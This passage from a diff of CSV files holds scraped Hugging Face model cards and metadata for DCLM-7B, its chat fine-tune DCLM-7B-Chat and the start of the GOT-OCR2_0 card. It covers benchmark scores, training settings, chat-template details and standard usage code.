huggingface/InferenceSupport/discussions/new?title=CrucibleAI/ControlNetMediaPipeFace&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BCrucibleAI%2FControlNetMediaPipeFace%5D(%2FCrucibleAI%2FControlNetMediaPipeFace)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, krnl/venereital-IA-23-space, nehho/CrucibleAI-ControlNetMediaPipeFace, satyac/CrucibleAI-ControlNetMediaPipeFace, teganmosi/CrucibleAI-ControlNetMediaPipeFace, tellview/CrucibleAI-ControlNetMediaPipeFace, tidy/CrucibleAI-ControlNetMediaPipeFace",13
|
DCLM-7B_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
@@ -0,0 +1,294 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
apple/DCLM-7B,"---
|
| 3 |
+
license: apple-ascl
|
| 4 |
+
---
|
| 5 |
+
|
| 6 |
+
|
| 7 |
+
|
| 8 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/63118add64939fabc0108b28/BB42g4V8HTxb5dR4tcy8A.png"" alt=""DCLM Logo"" width=""800"" style=""margin-left:'auto' margin-right:'auto' display:'block'""/>
|
| 9 |
+
|
| 10 |
+
|
| 11 |
+
# Model Card for DCLM-Baseline-7B
|
| 12 |
+
|
| 13 |
+
DCLM-Baseline-7B is a 7 billion parameter language model trained on the DCLM-Baseline dataset, which was curated as part of the DataComp for Language Models (DCLM) benchmark. This model is designed to showcase the effectiveness of systematic data curation techniques for improving language model performance.
|
| 14 |
+
|
| 15 |
+
## Model Details
|
| 16 |
+
|
| 17 |
+
| Size | Training Tokens | Layers | Hidden Size | Attention Heads | Context Length |
|
| 18 |
+
|------|-----------------|--------|-------------|-----------------|----------------|
|
| 19 |
+
| 7B | 2.5T | 32 | 4096 | 32 | 2048 |
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
### Model Description
|
| 23 |
+
|
| 24 |
+
- **Developed by:** DataComp for Language Models (DCLM) Team
|
| 25 |
+
- **Model type:** Decoder-only Transformer language model
|
| 26 |
+
- **Language(s):** English (primarily)
|
| 27 |
+
- **License:** Apple Sample Code License
|
| 28 |
+
- **Contact:** contact@datacomp.ai
|
| 29 |
+
- **Date:** June 2024
|
| 30 |
+
|
| 31 |
+
### Model Sources
|
| 32 |
+
|
| 33 |
+
- **Repository:** https://github.com/mlfoundations/dclm
|
| 34 |
+
- **Dataset:** https://huggingface.co/datasets/mlfoundations/dclm-baseline-1.0
|
| 35 |
+
- **Paper:** [DataComp-LM: In search of the next generation of training sets for language models](https://arxiv.org/abs/2406.11794)
|
| 36 |
+
|
| 37 |
+
|
| 38 |
+
## Using the Model
|
| 39 |
+
|
| 40 |
+
First, install `open_lm`:
|
| 41 |
+
|
| 42 |
+
```bash
|
| 43 |
+
pip install git+https://github.com/mlfoundations/open_lm.git
|
| 44 |
+
```
|
| 45 |
+
|
| 46 |
+
Then:
|
| 47 |
+
```python
|
| 48 |
+
from open_lm.hf import *
|
| 49 |
+
from transformers import AutoTokenizer, AutoModelForCausalLM
|
| 50 |
+
tokenizer = AutoTokenizer.from_pretrained(""apple/DCLM-Baseline-7B"")
|
| 51 |
+
model = AutoModelForCausalLM.from_pretrained(""apple/DCLM-Baseline-7B"")
|
| 52 |
+
|
| 53 |
+
inputs = tokenizer([""Machine learning is""], return_tensors=""pt"")
|
| 54 |
+
gen_kwargs = {""max_new_tokens"": 50, ""top_p"": 0.8, ""temperature"": 0.8, ""do_sample"": True, ""repetition_penalty"": 1.1}
|
| 55 |
+
output = model.generate(inputs['input_ids'], **gen_kwargs)
|
| 56 |
+
output = tokenizer.decode(output[0].tolist(), skip_special_tokens=True)
|
| 57 |
+
print(output)
|
| 58 |
+
```
|
| 59 |
+
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
|
| 63 |
+
|
| 64 |
+
|
| 65 |
+
### Training Details
|
| 66 |
+
|
| 67 |
+
The model was trained using the following setup:
|
| 68 |
+
|
| 69 |
+
- **Architecture:** Decoder-only Transformer
|
| 70 |
+
- **Framework:** PyTorch with OpenLM
|
| 71 |
+
- **Optimizer:** AdamW
|
| 72 |
+
- **Learning Rate:** 2e-3 (peak)
|
| 73 |
+
- **Weight Decay:** 0.05
|
| 74 |
+
- **Batch Size:** 2048 sequences
|
| 75 |
+
- **Sequence Length:** 2048 tokens
|
| 76 |
+
- **Total Training Tokens:** 2.5T
|
| 77 |
+
- **Hardware:** Trained on H100 GPUs
|
| 78 |
+
|
| 79 |
+
For more detailed training information, please refer to Section 3.4 and Appendix F of the DCLM paper.
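As a quick sanity check of these numbers (ours, not from the paper), the global batch and sequence length imply roughly 600K optimizer steps for the 2.5T-token run:

```python
# Back-of-the-envelope step count implied by the hyperparameters above
# (assumes the 2048-sequence batch is the effective global batch).
tokens_per_step = 2048 * 2048            # batch size x sequence length
steps = 2.5e12 / tokens_per_step         # total training tokens / tokens per step
print(f'~{steps:,.0f} optimizer steps')  # ~596,046
```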
|
| 80 |
+
To ensure our trained model is broadly useful, including for math and coding tasks, we combine our 3.8T [DCLM-BASELINE](https://huggingface.co/datasets/mlfoundations/dclm-baseline-1.0) with the [StarCoder](https://huggingface.co/datasets/bigcode/starcoderdata) and [ProofPile2](https://huggingface.co/datasets/EleutherAI/proof-pile-2) data to arrive at a 4.1T token dataset.
|
| 81 |
+
|
| 82 |
+
## Evaluation
|
| 83 |
+
|
| 84 |
+
Here are the evaluation results for DCLM-Baseline-7B on various tasks (using [llm-foundry](https://github.com/mosaicml/llm-foundry) eval suite)
|
| 85 |
+
|
| 86 |
+
| Task | Score |
|
| 87 |
+
|------|-------|
|
| 88 |
+
| MMLU (zero-shot) | 0.5766 |
|
| 89 |
+
| MMLU (few-shot) | 0.6372 |
|
| 90 |
+
| HellaSwag (zero-shot) | 0.7987 |
|
| 91 |
+
| HellaSwag | 0.8043 |
|
| 92 |
+
| Jeopardy | 0.4745 |
|
| 93 |
+
| TriviaQA | 0.5270 |
|
| 94 |
+
| GSM8K (CoT) | 0.0250 |
|
| 95 |
+
| AGI Eval SAT Math (CoT) | 0.0136 |
|
| 96 |
+
| AQuA (CoT) | 0.0490 |
|
| 97 |
+
| SVAMP (CoT) | 0.4900 |
|
| 98 |
+
| BigBench QA Wikidata | 0.7120 |
|
| 99 |
+
| ARC Easy | 0.8220 |
|
| 100 |
+
| ARC Challenge | 0.5990 |
|
| 101 |
+
| BigBench Misconceptions | 0.6986 |
|
| 102 |
+
| COPA | 0.8500 |
|
| 103 |
+
| SIQA | 0.8291 |
|
| 104 |
+
| CommonsenseQA | 0.8018 |
|
| 105 |
+
| PIQA | 0.8128 |
|
| 106 |
+
| OpenBookQA | 0.4540 |
|
| 107 |
+
| BigBench Novel Concepts | 0.7188 |
|
| 108 |
+
| BigBench Strange Stories | 0.7586 |
|
| 109 |
+
| BigBench Strategy QA | 0.6173 |
|
| 110 |
+
| LAMBADA | 0.8220 |
|
| 111 |
+
| Winograd | 0.8828 |
|
| 112 |
+
| Winogrande | 0.7269 |
|
| 113 |
+
| BigBench Conlang Translation | 0.0244 |
|
| 114 |
+
| BigBench Language Identification | 0.5219 |
|
| 115 |
+
| BigBench Conceptual Combinations | 0.6990 |
|
| 116 |
+
| BigBench Elementary Math QA | 0.3431 |
|
| 117 |
+
| BigBench Dyck Languages | 0.4930 |
|
| 118 |
+
| AGI Eval LSAT AR | 0.2435 |
|
| 119 |
+
| BigBench CS Algorithms | 0.6121 |
|
| 120 |
+
| BigBench Logical Deduction | 0.3620 |
|
| 121 |
+
| BigBench Operators | 0.4857 |
|
| 122 |
+
| BigBench Repeat Copy Logic | 0.4063 |
|
| 123 |
+
| Simple Arithmetic (no spaces) | 0.2940 |
|
| 124 |
+
| Simple Arithmetic (with spaces) | 0.3110 |
|
| 125 |
+
| MathQA | 0.3098 |
|
| 126 |
+
| LogiQA | 0.4132 |
|
| 127 |
+
| PubMedQA | 0.7060 |
|
| 128 |
+
| SQuAD | 0.5856 |
|
| 129 |
+
| AGI Eval LSAT RC | 0.6716 |
|
| 130 |
+
| AGI Eval LSAT LR | 0.5392 |
|
| 131 |
+
| CoQA | 0.4074 |
|
| 132 |
+
| BigBench Understanding Fables | 0.6825 |
|
| 133 |
+
| BoolQ | 0.8343 |
|
| 134 |
+
| AGI Eval SAT EN | 0.7670 |
|
| 135 |
+
| Winogender MC (Female) | 0.6000 |
|
| 136 |
+
| Winogender MC (Male) | 0.5500 |
|
| 137 |
+
| Enterprise PII Classification | 0.7676 |
|
| 138 |
+
| BBQ | 0.6912 |
|
| 139 |
+
| GPQA Main | 0.2612 |
|
| 140 |
+
| GPQA Diamond | 0.2475 |
|
| 141 |
+
|
| 142 |
+
Note: All scores are presented as decimal values between 0 and 1, representing the proportion of correct answers or the model's performance on each task.
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
## Comparison
|
| 146 |
+
|
| 147 |
+
|
| 148 |
+
Below are comparisons of this model with other models in the 7B regime.
|
| 149 |
+
|
| 150 |
+
| Model | Params | Tokens | Open dataset? | CORE | MMLU | EXTENDED |
|
| 151 |
+
|---------------|--------|--------|---------------|----------|----------|----------|
|
| 152 |
+
| **Open weights, closed datasets** | | | | | | |
|
| 153 |
+
| Llama2 | 7B | 2T | ❌ | 49.2 | 45.8 | 34.1 |
|
| 154 |
+
| DeepSeek | 7B | 2T | ❌ | 50.7 | 48.5 | 35.3 |
|
| 155 |
+
| Mistral-0.3 | 7B | ? | ❌ | 57.0 | 62.7 | 45.1 |
|
| 156 |
+
| QWEN-2 | 7B | ? | ❌ | 57.5 | **71.9** | 50.5 |
|
| 157 |
+
| Llama3 | 8B | 15T | ❌ | 57.6 | 66.2 | 46.3 |
|
| 158 |
+
| Gemma | 8B | 6T | ❌ | 57.8 | 64.3 | 44.6 |
|
| 159 |
+
| Phi-3 | 7B | ? | ❌ | **61.0** | 69.9 | **57.9** |
|
| 160 |
+
| **Open weights, open datasets** | | | | | | |
|
| 161 |
+
| Falcon | 7B | 1T | ✅ | 44.1 | 27.4 | 25.1 |
|
| 162 |
+
| OLMo-1.7 | 7B | 2.1T | ✅ | 47.0 | 54.0 | 34.2 |
|
| 163 |
+
| MAP-Neo | 7B | 4.5T | ✅ | **50.2** | **57.1** | **40.4** |
|
| 164 |
+
| **DCLM-7B** | 7B | 2.5T | ✅ | **56.1** | **63.7** | **43.6** |
|
| 165 |
+
|
| 166 |
+
|
| 167 |
+
|
| 168 |
+
## Limitations and Biases
|
| 169 |
+
|
| 170 |
+
While DCLM-Baseline-7B demonstrates strong performance across a range of tasks, it's important to note:
|
| 171 |
+
|
| 172 |
+
1. The model may exhibit biases present in its training data, which is derived from web crawl data.
|
| 173 |
+
2. It has not undergone specific alignment or safety fine-tuning, so outputs should be used with caution.
|
| 174 |
+
3. Performance on tasks not included in the evaluation suite may vary.
|
| 175 |
+
4. The model's knowledge is limited to its training data cutoff date.
|
| 176 |
+
|
| 177 |
+
## Ethical Considerations
|
| 178 |
+
|
| 179 |
+
Users should be aware that this model, like all large language models, can potentially generate harmful or biased content. It should not be used for making decisions about individuals or in sensitive applications without appropriate safeguards and human oversight.
|
| 180 |
+
|
| 181 |
+
## Citation
|
| 182 |
+
|
| 183 |
+
If you use this model in your research, please cite:
|
| 184 |
+
|
| 185 |
+
```
|
| 186 |
+
@article{Li2024DataCompLM,
|
| 187 |
+
title={DataComp-LM: In search of the next generation of training sets for language models},
|
| 188 |
+
author={Jeffrey Li and Alex Fang and Georgios Smyrnis and Maor Ivgi and Matt Jordan and Samir Gadre and Hritik Bansal and Etash Guha and Sedrick Keh and Kushal Arora and [... full author list]},
|
| 189 |
+
journal={arXiv preprint arXiv:2406.11794},
|
| 190 |
+
year={2024}
|
| 191 |
+
}
|
| 192 |
+
```
|
| 193 |
+
","{""id"": ""apple/DCLM-7B"", ""author"": ""apple"", ""sha"": ""c85bfa168f999ce27e954808bc005a2748fda5c5"", ""last_modified"": ""2024-07-26 03:40:38+00:00"", ""created_at"": ""2024-07-11 17:44:35+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 599, ""downloads_all_time"": null, ""likes"": 833, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""openlm"", ""arxiv:2406.11794"", ""license:apple-ascl"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: apple-ascl"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""OpenLMModel""], ""model_type"": ""openlm"", ""tokenizer_config"": {""unk_token"": ""<|endoftext|>"", ""bos_token"": ""<|endoftext|>"", ""eos_token"": ""<|endoftext|>""}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""jmercat/DCLM-demo"", ""Ireneo/apple_dclm"", ""ZMaxAIru/apple_dclm""], ""safetensors"": {""parameters"": {""F32"": 6889674752}, ""total"": 6889674752}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-07-26 03:40:38+00:00"", ""cardData"": ""license: apple-ascl"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""66901a03c961f5d23fe157b4"", ""modelId"": ""apple/DCLM-7B"", ""usedStorage"": 27558732152}",0,https://huggingface.co/mathewhe/DCLM-7B-Chat,1,,0,,0,,0,"Ireneo/apple_dclm, ZMaxAIru/apple_dclm, huggingface/InferenceSupport/discussions/new?title=apple/DCLM-7B&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bapple%2FDCLM-7B%5D(%2Fapple%2FDCLM-7B)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jmercat/DCLM-demo",4
|
| 194 |
+
mathewhe/DCLM-7B-Chat,"---
|
| 195 |
+
base_model: apple/DCLM-7B
|
| 196 |
+
datasets:
|
| 197 |
+
- HuggingFaceH4/ultrachat_200k
|
| 198 |
+
- teknium/OpenHermes-2.5
|
| 199 |
+
- princeton-nlp/gemma2-ultrafeedback-armorm
|
| 200 |
+
license: apache-2.0
|
| 201 |
+
tags:
|
| 202 |
+
- text
|
| 203 |
+
---
|
| 204 |
+
|
| 205 |
+
# DCLM-7B-Chat
|
| 206 |
+
|
| 207 |
+
This is a fine-tuned version of the DCLM-7B baseline model trained for chat
|
| 208 |
+
completions.
|
| 209 |
+
|
| 210 |
+
## Quick start
|
| 211 |
+
|
| 212 |
+
To use the model, `open_lm` must first be installed:
|
| 213 |
+
```shell
|
| 214 |
+
pip install git+https://github.com/mlfoundations/open_lm.git
|
| 215 |
+
```
|
| 216 |
+
|
| 217 |
+
Then simply load the model and generate responses:
|
| 218 |
+
```python
|
| 219 |
+
from open_lm.hf import *
|
| 220 |
+
from transformers import (
|
| 221 |
+
AutoModelForCausalLM,
|
| 222 |
+
AutoTokenizer,
|
| 223 |
+
)
|
| 224 |
+
|
| 225 |
+
|
| 226 |
+
model = AutoModelForCausalLM.from_pretrained(""mathewhe/DCLM-7B-Chat"")
|
| 227 |
+
tokenizer = AutoTokenizer.from_pretrained(""mathewhe/DCLM-7B-Chat"")
|
| 228 |
+
|
| 229 |
+
messages = [
|
| 230 |
+
{""role"": ""user"", ""content"": ""What is an LLM?""},
|
| 231 |
+
]
|
| 232 |
+
|
| 233 |
+
inputs = tokenizer.apply_chat_template(messages, return_tensors=""pt"")  # tokenize to a tensor for generate()
|
| 234 |
+
|
| 235 |
+
print(tokenizer.decode(model.generate(inputs)[0]))
|
| 236 |
+
```
|
| 237 |
+
|
| 238 |
+
Alternatively, copy the included `chat_class.py` module into your local
|
| 239 |
+
directory and just import the `Chat` class:
|
| 240 |
+
```python
|
| 241 |
+
from chat_class import Chat
|
| 242 |
+
chat = Chat() # default args: Chat(""mathewhe/DCLM-7B-Chat"", device=""cuda"")
|
| 243 |
+
|
| 244 |
+
# for one-off instructions
|
| 245 |
+
instruction = ""Write a list of ingredients for banana pudding.""
|
| 246 |
+
print(chat.instruct(instruction))
|
| 247 |
+
|
| 248 |
+
# for multi-turn chat
|
| 249 |
+
response1 = chat.message(""Who was Stan Lee?"")
|
| 250 |
+
response2 = chat.message(""What was his wife's name?"")
|
| 251 |
+
|
| 252 |
+
# to reset the chat
|
| 253 |
+
chat.reset()
|
| 254 |
+
```
|
| 255 |
+
|
| 256 |
+
## Chat template
|
| 257 |
+
|
| 258 |
+
This model uses the following chat template and does not support a separate
|
| 259 |
+
system prompt:
|
| 260 |
+
```
|
| 261 |
+
<|endoftext|>[INST] <user-message> [/INST][ASST] <llm-response> [/ASST]<|endoftext|>
|
| 262 |
+
```
|
| 263 |
+
|
| 264 |
+
The included tokenizer will correctly format messages, so you should not have
|
| 265 |
+
to manually format the input text.
|
| 266 |
+
|
| 267 |
+
Instead, use the tokenizer's `apply_chat_template()` method on a list of
|
| 268 |
+
messages.
|
| 269 |
+
Each message should be a dict with two keys:
|
| 270 |
+
- ""role"": Either ""user"" or ""assistant"".
|
| 271 |
+
- ""content"": The message to include.
|
| 272 |
+
|
| 273 |
+
For example:
|
| 274 |
+
```python
|
| 275 |
+
from transformers import AutoTokenizer
|
| 276 |
+
|
| 277 |
+
tokenizer = AutoTokenizer.from_pretrained(""mathewhe/DCLM-7B-Chat"")
|
| 278 |
+
|
| 279 |
+
messages = [
|
| 280 |
+
{""role"": ""user"", ""content"": ""Solve for x: 3x=4""},
|
| 281 |
+
{""role"": ""assistant"", ""content"": ""3x=4\n(3x)/3=(4)/3\nx=4/3""},
|
| 282 |
+
{""role"": ""user"", ""content"": ""Please explain your work.""},
|
| 283 |
+
]
|
| 284 |
+
print(tokenizer.apply_chat_template(messages, tokenize=False))
|
| 285 |
+
```
|
| 286 |
+
outputs
|
| 287 |
+
```
|
| 288 |
+
<|endoftext|>[INST] Solve for x: 3x=4 [/INST][ASST] 3x=4
|
| 289 |
+
(3x)/3=(4)/3
|
| 290 |
+
x=4/3 [/ASST]<|endoftext|><|endoftext|>[INST] Please explain your work [/INST]
|
| 291 |
+
```
|
| 292 |
+
|
| 293 |
+
See the example code in the included `chat_class.py` module for more details.
|
| 294 |
+
","{""id"": ""mathewhe/DCLM-7B-Chat"", ""author"": ""mathewhe"", ""sha"": ""57b8619821ccae0ad119f4311df77993c723fa34"", ""last_modified"": ""2024-08-05 13:38:24+00:00"", ""created_at"": ""2024-08-03 14:54:33+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1, ""downloads_all_time"": null, ""likes"": 2, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""openlm"", ""text"", ""dataset:HuggingFaceH4/ultrachat_200k"", ""dataset:teknium/OpenHermes-2.5"", ""dataset:princeton-nlp/gemma2-ultrafeedback-armorm"", ""base_model:apple/DCLM-7B"", ""base_model:finetune:apple/DCLM-7B"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: apple/DCLM-7B\ndatasets:\n- HuggingFaceH4/ultrachat_200k\n- teknium/OpenHermes-2.5\n- princeton-nlp/gemma2-ultrafeedback-armorm\nlicense: apache-2.0\ntags:\n- text"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""OpenLMForCausalLM""], ""model_type"": ""openlm"", ""tokenizer_config"": {""bos_token"": ""<|endoftext|>"", ""chat_template"": ""\n{%- for message in messages %}\n {%- if message['role'] == 'user' %}\n {{- bos_token + '[INST] ' + message['content'].strip() + ' [/INST]' }}\n {%- elif message['role'] == 'assistant' %}\n {{- '[ASST] ' + message['content'] + ' [/ASST]' + eos_token }}\n {%- endif %}\n{%- endfor %}\n"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""[PAD]"", ""unk_token"": ""<|endoftext|>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='chat_class.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 6889674752}, ""total"": 6889674752}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-05 13:38:24+00:00"", ""cardData"": ""base_model: apple/DCLM-7B\ndatasets:\n- HuggingFaceH4/ultrachat_200k\n- teknium/OpenHermes-2.5\n- princeton-nlp/gemma2-ultrafeedback-armorm\nlicense: apache-2.0\ntags:\n- text"", 
""transformersInfo"": null, ""_id"": ""66ae44a9a20def3de3de2257"", ""modelId"": ""mathewhe/DCLM-7B-Chat"", ""usedStorage"": 27558737584}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=mathewhe/DCLM-7B-Chat&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmathewhe%2FDCLM-7B-Chat%5D(%2Fmathewhe%2FDCLM-7B-Chat)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
GOT-OCR2_0_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv
ADDED
|
@@ -0,0 +1,436 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
stepfun-ai/GOT-OCR2_0,"---
|
| 3 |
+
pipeline_tag: image-text-to-text
|
| 4 |
+
language:
|
| 5 |
+
- multilingual
|
| 6 |
+
tags:
|
| 7 |
+
- got
|
| 8 |
+
- vision-language
|
| 9 |
+
- ocr2.0
|
| 10 |
+
- custom_code
|
| 11 |
+
license: apache-2.0
|
| 12 |
+
---
|
| 13 |
+
|
| 14 |
+
<h1>General OCR Theory: Towards OCR-2.0 via a Unified End-to-end Model
|
| 15 |
+
</h1>
|
| 16 |
+
|
| 17 |
+
[🔋Online Demo](https://huggingface.co/spaces/ucaslcl/GOT_online) | [🌟GitHub](https://github.com/Ucas-HaoranWei/GOT-OCR2.0/) | [📜Paper](https://arxiv.org/abs/2409.01704)</a>
|
| 18 |
+
|
| 19 |
+
|
| 20 |
+
[Haoran Wei*](https://scholar.google.com/citations?user=J4naK0MAAAAJ&hl=en), Chenglong Liu*, Jinyue Chen, Jia Wang, Lingyu Kong, Yanming Xu, [Zheng Ge](https://joker316701882.github.io/), Liang Zhao, [Jianjian Sun](https://scholar.google.com/citations?user=MVZrGkYAAAAJ&hl=en), [Yuang Peng](https://scholar.google.com.hk/citations?user=J0ko04IAAAAJ&hl=zh-CN&oi=ao), Chunrui Han, [Xiangyu Zhang](https://scholar.google.com/citations?user=yuB-cfoAAAAJ&hl=en)
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+

|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
## Usage
|
| 29 |
+
Inference using Hugging Face transformers on NVIDIA GPUs. Requirements were tested on Python 3.10:
|
| 30 |
+
```
|
| 31 |
+
torch==2.0.1
|
| 32 |
+
torchvision==0.15.2
|
| 33 |
+
transformers==4.37.2
|
| 34 |
+
tiktoken==0.6.0
|
| 35 |
+
verovio==4.3.1
|
| 36 |
+
accelerate==0.28.0
|
| 37 |
+
```
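These pins can be installed in one step (equivalent to listing them in a requirements.txt):

```bash
pip install torch==2.0.1 torchvision==0.15.2 transformers==4.37.2 \
    tiktoken==0.6.0 verovio==4.3.1 accelerate==0.28.0
```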
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
```python
|
| 41 |
+
from transformers import AutoModel, AutoTokenizer
|
| 42 |
+
|
| 43 |
+
tokenizer = AutoTokenizer.from_pretrained('ucaslcl/GOT-OCR2_0', trust_remote_code=True)
|
| 44 |
+
model = AutoModel.from_pretrained('ucaslcl/GOT-OCR2_0', trust_remote_code=True, low_cpu_mem_usage=True, device_map='cuda', use_safetensors=True, pad_token_id=tokenizer.eos_token_id)
|
| 45 |
+
model = model.eval().cuda()
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
# input your test image
|
| 49 |
+
image_file = 'xxx.jpg'
|
| 50 |
+
|
| 51 |
+
# plain texts OCR
|
| 52 |
+
res = model.chat(tokenizer, image_file, ocr_type='ocr')
|
| 53 |
+
|
| 54 |
+
# format texts OCR:
|
| 55 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format')
|
| 56 |
+
|
| 57 |
+
# fine-grained OCR:
|
| 58 |
+
# res = model.chat(tokenizer, image_file, ocr_type='ocr', ocr_box='')
|
| 59 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format', ocr_box='')
|
| 60 |
+
# res = model.chat(tokenizer, image_file, ocr_type='ocr', ocr_color='')
|
| 61 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format', ocr_color='')
|
| 62 |
+
|
| 63 |
+
# multi-crop OCR:
|
| 64 |
+
# res = model.chat_crop(tokenizer, image_file, ocr_type='ocr')
|
| 65 |
+
# res = model.chat_crop(tokenizer, image_file, ocr_type='format')
|
| 66 |
+
|
| 67 |
+
# render the formatted OCR results:
|
| 68 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format', render=True, save_render_file = './demo.html')
|
| 69 |
+
|
| 70 |
+
print(res)
|
| 71 |
+
|
| 72 |
+
|
| 73 |
+
```
|
| 74 |
+
More details about 'ocr_type', 'ocr_box', 'ocr_color', and 'render' can be found at our GitHub.
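For batch use, the documented plain-text mode composes naturally into a loop; a small sketch, with a hypothetical folder of scans:

```python
# Sketch: run the plain-text OCR mode shown above over a folder of images.
from pathlib import Path

results = {}
for path in sorted(Path('./scans').glob('*.jpg')):  # hypothetical folder
    results[path.name] = model.chat(tokenizer, str(path), ocr_type='ocr')

for name, text in results.items():
    print(f'--- {name} ---\n{text}')
```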
|
| 75 |
+
Our training codes are available at our [GitHub](https://github.com/Ucas-HaoranWei/GOT-OCR2.0/).
|
| 76 |
+
|
| 77 |
+
|
| 78 |
+
|
| 79 |
+
## More Multimodal Projects
|
| 80 |
+
|
| 81 |
+
👏 Welcome to explore more multimodal projects of our team:
|
| 82 |
+
|
| 83 |
+
[Vary](https://github.com/Ucas-HaoranWei/Vary) | [Fox](https://github.com/ucaslcl/Fox) | [OneChart](https://github.com/LingyvKong/OneChart)
|
| 84 |
+
|
| 85 |
+
## Citation
|
| 86 |
+
|
| 87 |
+
If you find our work helpful, please consider citing our papers 📝 and liking this project ❤️!
|
| 88 |
+
|
| 89 |
+
```bib
|
| 90 |
+
@article{wei2024general,
|
| 91 |
+
title={General OCR Theory: Towards OCR-2.0 via a Unified End-to-end Model},
|
| 92 |
+
